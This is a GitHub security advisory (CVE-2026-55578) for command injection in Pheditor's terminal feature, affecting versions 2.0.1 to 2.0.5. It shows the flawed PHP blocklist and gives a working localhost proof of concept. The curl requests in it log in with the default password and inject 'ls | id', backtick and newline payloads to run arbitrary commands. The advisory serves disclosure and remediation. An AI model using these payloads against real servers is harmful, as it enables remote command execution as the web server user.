{"id":"GHSA-wg4w-wr5q-6vjc","summary":"Pheditor: Incomplete command sanitization in terminal feature allows RCE via pipe operator, backtick substitution, and newline injection","details":"### Summary\n\nThe terminal feature in Pheditor uses an incomplete character blocklist to sanitize user-supplied commands before passing them to `shell_exec()`. After the fix for GHSA-9643-6xjp-vx57 (which added `$` to the blocklist), the characters `|` (single pipe), `` ` `` (backtick), and the newline byte (`0x0A`) remain unblocked. An authenticated user with the `terminal` permission (enabled by default) can leverage any of these to bypass the `TERMINAL_COMMANDS` allowlist and execute arbitrary OS commands as the web server user.\n\n### Details\n\nTested repository: https://github.com/pheditor/pheditor\n\nTested commit: `e538f05b6faec99e5b23726bc9c17d6b57774297` (current HEAD on `main`)\n\nAffected version: Pheditor 2.0.1+\n\nThe terminal handler receives `$_POST['command']` and passes it to `shell_exec()` at `pheditor.php:586`:\n\n```php\n$output = shell_exec((empty($dir) ? null : 'cd ' . escapeshellarg($dir) . ' && ') . $command . ' && echo \\ ; pwd');\n```\n\nThe blocklist at `pheditor.php:557` checks for `&`, `;`, `||`, and `$`, but does not block `|`, `` ` ``, or newline (`0x0A`):\n\n```php\nif (strpos($command, '&') !== false || strpos($command, ';') !== false || strpos($command, '||') !== false || strpos($command, '$') !== false) {\n    echo json_error(\"Illegal character(s) in command (& ; ||)\\n\");\n    exit;\n}\n```\n\nThe `TERMINAL_COMMANDS` prefix check at `pheditor.php:566-573` only validates that the command starts with an allowed name. All three bypasses start with a whitelisted command prefix.\n\n**Bypass 1 — Single pipe `|`:**\nThe filter checks for `||` but not single `|`. Payload `ls | id` passes both the blocklist and the whitelist (starts with `ls`). The shell executes: `cd '\u003cdir\u003e' && ls | id && echo \\ ; pwd`, running `id`.\n\n**Bypass 2 — Backtick `` ` ``:**\nBacktick is not in the blocklist. Payload `` echo `id` `` passes the blocklist and whitelist (starts with `echo`). The shell executes `id` inside backtick substitution.\n\n**Bypass 3 — Newline `0x0A`:**\nA literal newline byte is not in the blocklist. Payload `ls\\ntouch /tmp/proof` (where `\\n` is 0x0A) passes both checks. Only the first line is validated against the whitelist. The second line runs as an independent command.\n\n### PoC\n\n**Environment:** Any system running PHP 8.x with pheditor.php deployed and `shell_exec()` enabled.\n\n**Setup:**\n```bash\ngit clone https://github.com/pheditor/pheditor /tmp/pheditor-test\ncd /tmp/pheditor-test\nphp -S localhost:8080 pheditor.php &\n```\n\n**Authenticate** (default password `admin`):\n```bash\ncurl -s -c /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php -d \"pheditor_password=admin\" -L \u003e /dev/null\nTOKEN=$(curl -s -b /tmp/cookies.txt http://localhost:8080/pheditor.php | grep -o 'token = \"[a-f0-9]*\"' | grep -o '\"[a-f0-9]*\"' | tr -d '\"')\n```\n\n**Bypass 1 (pipe `|`):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n  --data-urlencode \"action=terminal\" \\\n  --data-urlencode \"token=$TOKEN\" \\\n  --data-urlencode \"command=ls | id\" \\\n  --data-urlencode \"dir=\"\n```\nExpected: `{\"error\":false,\"message\":\"OK\",\"result\":\"uid=... gid=...\\n\",...}` — `id` output proves RCE.\n\n**Bypass 2 (backtick):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n  --data-urlencode \"action=terminal\" \\\n  --data-urlencode \"token=$TOKEN\" \\\n  --data-urlencode 'command=echo `id`' \\\n  --data-urlencode \"dir=\"\n```\nExpected: Same `id` output in response.\n\n**Bypass 3 (newline 0x0A):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n  --data-urlencode \"action=terminal\" \\\n  --data-urlencode \"token=$TOKEN\" \\\n  --data-urlencode $'command=ls\\nid' \\\n  --data-urlencode \"dir=\"\n```\nExpected: Same `id` output in response.\n\n**Control (blocked command without bypass):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n  --data-urlencode \"action=terminal\" \\\n  --data-urlencode \"token=$TOKEN\" \\\n  --data-urlencode \"command=whoami\" \\\n  --data-urlencode \"dir=\"\n```\nExpected: `{\"error\":true,\"message\":\"Command not allowed...\"}` — allowlist enforced.\n\n**Cleanup:**\n```bash\nkill %1; rm -rf /tmp/pheditor-test /tmp/cookies.txt\n```\n\n### Impact\n\nOS Command Injection (CWE-78). Any authenticated Pheditor user with the `terminal` permission (enabled by default) can bypass the `TERMINAL_COMMANDS` allowlist and execute arbitrary OS commands as the web server user. This is a bypass of the partial fix for GHSA-9643-6xjp-vx57 — that fix addressed `$()` substitution but three additional shell metacharacters remain unblocked.\n\n**Attacker privileges:** Authenticated user (PR:L). Combined with default password `admin`, effectively PR:N.\n\n**Impact:** Full read/write/execute access as the web server user. Confidentiality: High (read any accessible file). Integrity: High (write/delete files, deploy webshells). Availability: High (disrupt services).\n\n**Suggested remediation:** Parse the command into executable + arguments, validate the executable against `TERMINAL_COMMANDS` with exact match, pass each argument through `escapeshellarg()`, or use `proc_open()` with an argument array to avoid shell interpretation entirely.","aliases":["CVE-2026-55578"],"modified":"2026-07-28T04:14:47.126184068Z","published":"2026-07-16T20:10:47Z","related":["CVE-2026-55578"],"database_specific":{"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-07-16T20:10:47Z","nvd_published_at":null,"cwe_ids":["CWE-78"]},"references":[{"type":"WEB","url":"https://github.com/pheditor/pheditor/security/advisories/GHSA-wg4w-wr5q-6vjc"},{"type":"PACKAGE","url":"https://github.com/pheditor/pheditor"},{"type":"WEB","url":"https://github.com/pheditor/pheditor/releases/tag/2.0.6"}],"affected":[{"package":{"name":"pheditor/pheditor","ecosystem":"Packagist","purl":"pkg:composer/pheditor/pheditor"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.0.1"},{"fixed":"2.0.6"}]}],"versions":["2.0.1","2.0.2","2.0.3","2.0.4","2.0.5"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-wg4w-wr5q-6vjc/GHSA-wg4w-wr5q-6vjc.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}]}